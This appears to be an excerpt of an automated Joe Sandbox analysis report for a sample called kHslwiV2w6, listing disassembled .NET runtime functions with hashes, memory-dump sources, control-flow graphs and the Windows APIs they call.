                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                  • Opcode ID: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
                                                                                                                                                                                                                                                                                  • Instruction ID: a25cc48f152f51fd0ec1ed7635dada4dc9258f79d81d6b51e4bde3ce49e9318e
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB219833B05A809AE724EF61EC109E977A5FB58798F900136FE4E83A49DF38C491CB50
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D88D9 Relevance: .8, Instructions: 829COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: f905b1f908e65b5aba95cf85111788d4451240a2511b24a2e32d8eb1b4069d57
                                                                                                                                                                                                                                                                                  • Instruction ID: c1eef9ab636d53de4eb6ac5d5013c03795574541e35687f84ae3a0a5987267dd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f905b1f908e65b5aba95cf85111788d4451240a2511b24a2e32d8eb1b4069d57
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2682D032B0A78586EB10AF66EC406B9B7A5FB48B94F944136DE6D53B94CF3CE441CB10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D2370 Relevance: .4, Instructions: 392COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2050909247-0
                                                                                                                                                                                                                                                                                  • Opcode ID: bdf8833cee21c139ef57a5bee3b8c50e71db7ac1327d835877ec4aba224b51aa
                                                                                                                                                                                                                                                                                  • Instruction ID: 4e415a14b3858e203e0d10bdac1b79f9bcf2ce029f7e366593ae58ce2f783f65
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdf8833cee21c139ef57a5bee3b8c50e71db7ac1327d835877ec4aba224b51aa
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B02BF75F0E6C687FA15AB2AAC512F8E6A1EF59794FD4463AC41D12360DF3CB580CE20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D0C50 Relevance: .3, Instructions: 317COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 43a4ce6d3edcbc3c7c6dd526977bf27065133be5ff1af8be5729591fa77bad5d
                                                                                                                                                                                                                                                                                  • Instruction ID: 2f6aa8c7d95c6282af26816fc119d0186afb0cfbbd760836b54bb43d36cbe366
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43a4ce6d3edcbc3c7c6dd526977bf27065133be5ff1af8be5729591fa77bad5d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96F15D29F1DBC246F642FB25AD512F5E2A1EFA9344FD85336D44D513A2EF2C74D08A20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5CC9B6 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 393COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 0 7ff72f5cc9b6-7ff72f5cc9bd 1 7ff72f5cc9bf-7ff72f5cc9d5 call 7ff72f5e0c30 0->1 2 7ff72f5cc9da-7ff72f5cca10 call 7ff72f5d09b0 0->2 7 7ff72f5cd0fd-7ff72f5cd120 1->7 8 7ff72f5cca25-7ff72f5cca37 2->8 9 7ff72f5cca12-7ff72f5cca23 call 7ff72f60ac40 2->9 11 7ff72f5cd122 call 7ff72f5bbdb0 7->11 12 7ff72f5cd127-7ff72f5cd12e 7->12 13 7ff72f5cca3e-7ff72f5cca50 call 7ff72f5dadb0 call 7ff72f5be5f0 8->13 14 7ff72f5cca39 call 7ff72f5c67f0 8->14 9->8 11->12 22 7ff72f5cca52-7ff72f5cca5c 13->22 23 7ff72f5ccabc-7ff72f5ccb0c call 7ff72f5cdfd0 call 7ff72f5d2370 13->23 14->13 24 7ff72f5ccab5 22->24 25 7ff72f5cca5e 22->25 35 7ff72f5ccb2b-7ff72f5ccb38 23->35 36 7ff72f5ccb0e-7ff72f5ccb25 call 7ff72f5b0130 23->36 24->23 27 7ff72f5cca60-7ff72f5cca6d 25->27 30 7ff72f5ccaa5-7ff72f5ccab3 call 7ff72f5dd0e0 27->30 31 7ff72f5cca6f-7ff72f5ccaa0 call 7ff72f60f5b0 27->31 30->24 30->27 31->30 39 7ff72f5ccb57-7ff72f5ccb5a 35->39 40 7ff72f5ccb3a-7ff72f5ccb44 35->40 36->35 43 7ff72f5ccb63-7ff72f5ccb79 call 7ff72f5a2c80 39->43 44 7ff72f5ccb5c 39->44 40->39 42 7ff72f5ccb46-7ff72f5ccb4e 40->42 42->39 45 7ff72f5ccb50 42->45 48 7ff72f5ccbe6-7ff72f5ccc18 call 7ff72f5ac0a0 call 7ff72f5ca330 call 7ff72f5c7e30 call 7ff72f5b26e0 43->48 49 7ff72f5ccb7b-7ff72f5ccb83 43->49 44->43 45->39 62 7ff72f5ccc2b-7ff72f5ccc37 call 7ff72f5b26e0 48->62 63 7ff72f5ccc1a-7ff72f5ccc21 call 7ff72f5b26e0 48->63 49->48 51 7ff72f5ccb85-7ff72f5ccb8c 49->51 51->48 52 7ff72f5ccb8e-7ff72f5ccb95 51->52 52->48 54 7ff72f5ccb97-7ff72f5ccba4 52->54 54->48 56 7ff72f5ccba6-7ff72f5ccbdf 54->56 56->48 68 7ff72f5ccc3d-7ff72f5cccbb EnterCriticalSection 62->68 69 7ff72f5cd0c7 call 7ff72f5cd130 62->69 63->62 70 7ff72f5ccc23-7ff72f5ccc26 call 7ff72f5e1200 63->70 72 7ff72f5cccbd-7ff72f5cccc4 68->72 73 7ff72f5ccd1e-7ff72f5ccd25 LeaveCriticalSection 68->73 77 7ff72f5cd0cc-7ff72f5cd0f6 GetTickCount64 69->77 70->62 72->73 76 7ff72f5cccc6-7ff72f5cccea call 7ff72f5abc10 72->76 75 7ff72f5ccd2a-7ff72f5ccd4c 73->75 78 7ff72f5ccf66-7ff72f5ccf77 75->78 79 7ff72f5ccd52-7ff72f5ccd59 75->79 76->73 87 7ff72f5cccec-7ff72f5ccd01 LeaveCriticalSection 76->87 77->7 81 7ff72f5ccf7d-7ff72f5ccf8c 78->81 82 7ff72f5ccd60-7ff72f5ccd66 79->82 81->69 84 7ff72f5ccf92-7ff72f5ccf99 81->84 85 7ff72f5ccd6c-7ff72f5ccd76 82->85 86 7ff72f5cce59-7ff72f5cce63 82->86 88 7ff72f5ccfa0-7ff72f5ccff0 84->88 89 7ff72f5ccd78 85->89 90 7ff72f5ccd99-7ff72f5ccd9c 85->90 86->82 92 7ff72f5cce69-7ff72f5ccee5 call 7ff72f5ac570 86->92 87->75 91 7ff72f5ccd03-7ff72f5ccd0c 87->91 88->88 94 7ff72f5ccff2-7ff72f5cd02f 88->94 95 7ff72f5ccd80-7ff72f5ccd87 89->95 90->86 96 7ff72f5ccda2-7ff72f5ccda8 90->96 91->75 97 7ff72f5ccd0e-7ff72f5ccd1c call 7ff72f5abf70 91->97 104 7ff72f5ccf0d-7ff72f5ccf17 92->104 105 7ff72f5ccee7-7ff72f5cceea 92->105 94->77 99 7ff72f5cd035-7ff72f5cd0c5 call 7ff72f5cd130 call 7ff72f5c9980 94->99 95->86 100 7ff72f5ccd8d-7ff72f5ccd97 95->100 101 7ff72f5cce4c-7ff72f5cce53 96->101 102 7ff72f5ccdae-7ff72f5ccdb5 96->102 97->75 99->77 100->90 100->95 101->86 101->96 107 7ff72f5cce1f-7ff72f5cce31 call 7ff72f5c4020 102->107 108 7ff72f5ccdb7-7ff72f5ccdc8 102->108 111 7ff72f5ccf26-7ff72f5ccf51 call 7ff72f5d0950 call 7ff72f5ca330 104->111 112 7ff72f5ccf19-7ff72f5ccf24 104->112 110 7ff72f5ccef1-7ff72f5ccef4 105->110 107->78 129 7ff72f5cce37-7ff72f5cce3d 107->129 115 7ff72f5ccdf3 108->115 116 7ff72f5ccdca-7ff72f5ccdd1 108->116 110->104 118 7ff72f5ccef6-7ff72f5ccf0b 110->118 119 7ff72f5ccf56-7ff72f5ccf5d 111->119 112->119 117 7ff72f5ccdf6-7ff72f5cce0f call 7ff72f5c4020 115->117 123 7ff72f5ccdd3-7ff72f5ccde1 call 7ff72f5c4020 116->123 124 7ff72f5ccdee-7ff72f5ccdf1 116->124 117->78 139 7ff72f5cce15-7ff72f5cce1d 117->139 118->104 118->110 119->81 130 7ff72f5ccf5f-7ff72f5ccf64 call 7ff72f5c9980 119->130 123->78 138 7ff72f5ccde7-7ff72f5ccdec 123->138 124->115 124->117 134 7ff72f5cce44-7ff72f5cce48 129->134 135 7ff72f5cce3f 129->135 130->81 134->101 135->134 138->101 139->101
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: .NET BGC$@=}$BEGIN$condemned generation num: %d$m$qX
                                                                                                                                                                                                                                                                                  • API String ID: 0-3995759144
                                                                                                                                                                                                                                                                                  • Opcode ID: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
                                                                                                                                                                                                                                                                                  • Instruction ID: 9477399ca64bd25bf3ed19f7c2682a6b0d12b3d35d22517f7a61e40c78fb776c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE222765F0CAC282F611AF29AC452F4A3A0FF69754FD45235DA4E52362DF3CB5818B70
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B1010 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                                                                                                                                                                                                                                                  • String ID: @$@$@
                                                                                                                                                                                                                                                                                  • API String ID: 2645093340-1177533131
                                                                                                                                                                                                                                                                                  • Opcode ID: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
                                                                                                                                                                                                                                                                                  • Instruction ID: dd8ae5ea1e2460e8f4c5ed3eea7a04661ab09918c0fb726024f2b2f0547ff716
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E74164327086D185EBB19F12E9443EAB7A5FB48B90F844235DE9D57B88CF3CD4468B10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5AB820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF72F5A474F,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5AB82B
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5B1460: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B146F
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5B1460: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14AD
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5B1460: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14D9
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5B1460: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14EA
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5B1460: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14F9
                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF72F5A474F,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5AB89D
                                                                                                                                                                                                                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF72F5AB8B0
                                                                                                                                                                                                                                                                                  • QueryInformationJobObject.KERNEL32 ref: 00007FF72F5AB8FE
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
                                                                                                                                                                                                                                                                                  • String ID: PROCESSOR_COUNT
                                                                                                                                                                                                                                                                                  • API String ID: 1701933505-4048346908
                                                                                                                                                                                                                                                                                  • Opcode ID: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
                                                                                                                                                                                                                                                                                  • Instruction ID: 0a1fd428d77583d1d67347b0050a864ab42b6ba9be5421b91c2553f29e789b6e
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC317C21B09E8396EB54BB56DC903F9E3A1FF44784FC40036DA8E46695DE2CE519CFA0
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A4740 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5AB820: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF72F5A474F,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5AB82B
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5AB820: QueryInformationJobObject.KERNEL32 ref: 00007FF72F5AB8FE
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5AB6C0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF72F5A4778,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5AB6D1
                                                                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5A48BE
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocExceptionFailFastHandleInformationModuleObjectQueryRaise
                                                                                                                                                                                                                                                                                  • String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
                                                                                                                                                                                                                                                                                  • API String ID: 3403879507-2841289747
                                                                                                                                                                                                                                                                                  • Opcode ID: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
                                                                                                                                                                                                                                                                                  • Instruction ID: 9d6c58bc3758ef9e2e6115f95b89f8a6a71ce5db60e74c0078ab926b765107c2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E415E26B0A6C395E600BB62AD026F9E791FF41B84FC44071ED4D176A6CF2CE425CF60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A54E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86sleepCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF72F5A55E6
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExceptionFailFastRaise$Sleep
                                                                                                                                                                                                                                                                                  • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                                                                                                                                                                                                                                                  • API String ID: 3706814929-926682358
                                                                                                                                                                                                                                                                                  • Opcode ID: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
                                                                                                                                                                                                                                                                                  • Instruction ID: 103e782eac3740ddacbc615841045e49e46c933402beeab31caa5e172a73435e
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E941443AB1AA8686EB50EF16EC417A9B3A2FB48784FC44035DA4D43390DF3DE551CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5ABA80 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
